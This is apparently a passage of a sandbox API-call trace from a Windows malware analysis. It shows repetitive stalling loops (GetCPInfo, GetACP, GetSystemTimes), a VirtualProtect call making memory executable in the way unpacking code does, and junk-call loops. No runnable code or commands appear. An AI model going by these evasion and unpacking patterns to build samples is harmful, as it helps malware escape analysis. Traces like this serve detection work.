GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.655] GetACP () returned 0x4e4 [0044.655] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.655] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.655] GetACP () returned 0x4e4 [0044.655] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.655] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.655] GetACP () returned 0x4e4 [0044.655] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.655] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.655] GetACP () returned 0x4e4 [0044.655] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.655] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.655] GetACP () returned 0x4e4 [0044.655] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.655] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.655] GetACP () returned 0x4e4 [0044.655] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.655] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.655] GetACP () returned 0x4e4 [0044.655] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.656] GetACP () returned 0x4e4 [0044.656] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.656] GetACP () returned 0x4e4 [0044.656] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.656] GetACP () returned 0x4e4 [0044.656] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.656] GetACP () returned 0x4e4 [0044.656] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.656] GetACP () returned 0x4e4 [0044.656] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.656] GetACP () returned 0x4e4 [0044.656] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.656] GetACP () returned 0x4e4 [0044.656] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.656] GetACP () returned 0x4e4 [0044.656] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.656] GetACP () returned 0x4e4 [0044.656] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.657] GetACP () returned 0x4e4 [0044.657] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.657] GetACP () returned 0x4e4 [0044.657] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.657] GetACP () returned 0x4e4 [0044.657] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.657] GetACP () returned 0x4e4 [0044.657] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.657] GetACP () returned 0x4e4 [0044.657] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.657] GetACP () returned 0x4e4 [0044.657] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.657] GetACP () returned 0x4e4 [0044.657] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.657] GetACP () returned 0x4e4 [0044.657] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.657] GetACP () returned 0x4e4 [0044.657] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.658] GetACP () returned 0x4e4 [0044.658] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.658] GetACP () returned 0x4e4 [0044.658] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.658] GetACP () returned 0x4e4 [0044.658] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.658] GetACP () returned 0x4e4 [0044.658] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.658] GetACP () returned 0x4e4 [0044.658] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.658] GetACP () returned 0x4e4 [0044.658] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.658] GetACP () returned 0x4e4 [0044.658] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.658] GetACP () returned 0x4e4 [0044.658] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.658] GetACP () returned 0x4e4 [0044.658] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.659] GetACP () returned 0x4e4 [0044.659] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.659] GetACP () returned 0x4e4 [0044.659] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.659] GetACP () returned 0x4e4 [0044.659] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.659] GetACP () returned 0x4e4 [0044.659] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.659] GetACP () returned 0x4e4 [0044.659] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.659] GetACP () returned 0x4e4 [0044.659] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.659] GetACP () returned 0x4e4 [0044.659] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.659] GetACP () returned 0x4e4 [0044.659] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.659] GetACP () returned 0x4e4 [0044.659] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.659] GetACP () returned 0x4e4 [0044.659] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.660] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.660] GetACP () returned 0x4e4 [0044.660] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.660] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.660] GetACP () returned 0x4e4 [0044.815] VirtualProtect (in: lpAddress=0x4f5aa8, dwSize=0xfacb, flNewProtect=0x40, lpflOldProtect=0x43bc04 | out: lpflOldProtect=0x43bc04*=0x4) returned 1 [0044.816] AddAtomA (lpString=0x0) returned 0x0 [0044.816] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.816] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.816] AddAtomA (lpString=0x0) returned 0x0 [0044.816] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.816] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.816] AddAtomA (lpString=0x0) returned 0x0 [0044.816] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.816] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.816] AddAtomA (lpString=0x0) returned 0x0 [0044.816] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.816] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.816] AddAtomA (lpString=0x0) returned 0x0 [0044.816] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.816] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.816] AddAtomA (lpString=0x0) returned 0x0 [0044.816] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.816] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.816] AddAtomA (lpString=0x0) returned 0x0 [0044.816] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.817] AddAtomA (lpString=0x0) returned 0x0 [0044.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.817] AddAtomA (lpString=0x0) returned 0x0 [0044.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.817] AddAtomA (lpString=0x0) returned 0x0 [0044.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.817] AddAtomA (lpString=0x0) returned 0x0 [0044.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.817] AddAtomA (lpString=0x0) returned 0x0 [0044.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.817] AddAtomA (lpString=0x0) returned 0x0 [0044.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.817] AddAtomA (lpString=0x0) returned 0x0 [0044.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.817] AddAtomA (lpString=0x0) returned 0x0 [0044.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.817] AddAtomA (lpString=0x0) returned 0x0 [0044.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.817] AddAtomA (lpString=0x0) returned 0x0 [0044.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.817] AddAtomA (lpString=0x0) returned 0x0 [0044.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.817] AddAtomA (lpString=0x0) returned 0x0 [0044.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.817] AddAtomA (lpString=0x0) returned 0x0 [0044.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.818] AddAtomA (lpString=0x0) returned 0x0 [0044.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.818] AddAtomA (lpString=0x0) returned 0x0 [0044.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.818] AddAtomA (lpString=0x0) returned 0x0 [0044.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.818] AddAtomA (lpString=0x0) returned 0x0 [0044.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.818] AddAtomA (lpString=0x0) returned 0x0 [0044.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.818] AddAtomA (lpString=0x0) returned 0x0 [0044.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.818] AddAtomA (lpString=0x0) returned 0x0 [0044.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.818] AddAtomA (lpString=0x0) returned 0x0 [0044.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.818] AddAtomA (lpString=0x0) returned 0x0 [0044.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.818] AddAtomA (lpString=0x0) returned 0x0 [0044.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.818] AddAtomA (lpString=0x0) returned 0x0 [0044.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.818] AddAtomA (lpString=0x0) returned 0x0 [0044.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.819] AddAtomA (lpString=0x0) returned 0x0 [0044.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.819] AddAtomA (lpString=0x0) returned 0x0 [0044.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.819] AddAtomA (lpString=0x0) returned 0x0 [0044.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.819] AddAtomA (lpString=0x0) returned 0x0 [0044.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.819] AddAtomA (lpString=0x0) returned 0x0 [0044.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.819] AddAtomA (lpString=0x0) returned 0x0 [0044.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.819] AddAtomA (lpString=0x0) returned 0x0 [0044.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.819] AddAtomA (lpString=0x0) returned 0x0 [0044.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.819] AddAtomA (lpString=0x0) returned 0x0 [0044.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.819] AddAtomA (lpString=0x0) returned 0x0 [0044.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.819] AddAtomA (lpString=0x0) returned 0x0 [0044.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.819] AddAtomA (lpString=0x0) returned 0x0 [0044.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0044.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0044.819] AddAtomA (lpString=0x0) returned 0x0 [0044.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 